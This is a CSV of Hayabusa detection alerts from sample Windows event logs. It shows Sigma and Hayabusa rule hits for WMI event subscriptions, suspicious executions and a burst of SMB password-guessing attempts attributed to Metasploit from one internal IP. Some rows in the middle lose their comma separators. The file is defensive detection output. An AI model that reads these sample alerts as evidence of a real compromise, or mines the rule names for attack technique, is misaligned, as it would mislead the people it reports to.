2016-09-03 23:48:49.187 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:49:58.603 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:51:06.219 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:51:13.833 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:51:25.086 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:51:39.538 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:52:37.050 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:53:24.700 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-03 23:53:57.790 +09:00,IE10Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 06:19:15.500 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 06:35:15.664 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-04 06:37:55.000 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 22:32:03.952 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-04 22:32:29.279 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-15 11:13:19.927 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-15 23:50:14.730 +09:00,IE10Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-16 05:09:55.941 +09:00,IE10Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10592016-09-16 05:09:55.941 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10602016-09-18 07:53:42.819 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10612016-09-18 07:53:42.819 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10622016-09-18 07:56:46.000 +09:00IE10Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
10632016-09-18 07:56:47.728 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10642016-09-18 07:56:47.728 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10652016-09-18 08:03:40.000 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
10662016-09-18 08:03:40.000 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
10672016-09-19 23:56:52.427 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10682016-09-19 23:56:52.427 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10692016-09-19 23:57:15.380 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10702016-09-19 23:57:15.380 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10712016-09-20 00:13:04.000 +09:00IE10Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
10722016-09-20 00:13:05.415 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10732016-09-20 00:13:05.415 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
10742016-09-20 00:15:08.000 +09:00IE10Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
10752016-09-20 00:15:08.000 +09:00IE10Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
10762016-09-20 01:34:31.100 +09:00IE10Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,informational,Logon Failure - Username does not exist,User: JcDfcZTc : Type: 3 : Workstation: 6hgtmVlrrFuWtO65 : IP Address: 192.168.198.149 : SubStatus: 0xc0000064 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongUsername.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.477 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gC4ymsKbxVGScMgY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.513 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.513 +09:00,-,-,medium,Password Guessing Attack,[condition] count() by IpAddress >= 5 in timeframe [result] count:3558 IpAddress:192.168.198.149 timeframe:5m,rules/hayabusa/default/alerts/Security/4625_BruteForce_PasswordGuessingDetect.yml,-
2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2q1tdAUlxHGfGH6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.588 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3EPNzcwy7tOAADWx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.637 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AbwsMP10Rs4h1Wl1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EEcdqcpqsxQ4RgPx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.725 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngdtRwzXXhAlRxGY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BbCFZw5qQgU7rQ9W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SXr7lA3MkV6xK36f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.869 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tVFs1kR0AuOutnuI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.909 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PkeEabFrDLsBVcXi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:06.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GH7dTevmTKZo46Tq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l2E8JmrfaCj5AjSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.052 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N4FLUvawWPVqdLaD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.091 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KN0EeUzxSZy5l7J4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l8FjH0QHqromIYWf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.169 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fhlF37S1wNupiX5O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j19XhmSXK526I8kf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.262 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IRcppJXDNNfKuvdc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.297 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0FoGAIAK2FV3zCJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.343 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uYWIk76XIksgN3sE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3FEop7o3SOolNvKs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.444 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cMGEM3ql9uov7zCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EFPUA4pUPaLrkr1I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.520 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7IeJU89jxitz407 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.551 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wqj9nXRaDpwCJZO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.590 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bl0d61v2Ux7cNv4r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.631 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8LxTa5lyutrIB2cd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.663 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPCy11e3YxcCloSH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.684 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Mj07WKc4aQqPC0Te : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.720 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2M3v4TsQul5R4sj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.752 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I67uBcH52tgLzhVB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:07.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
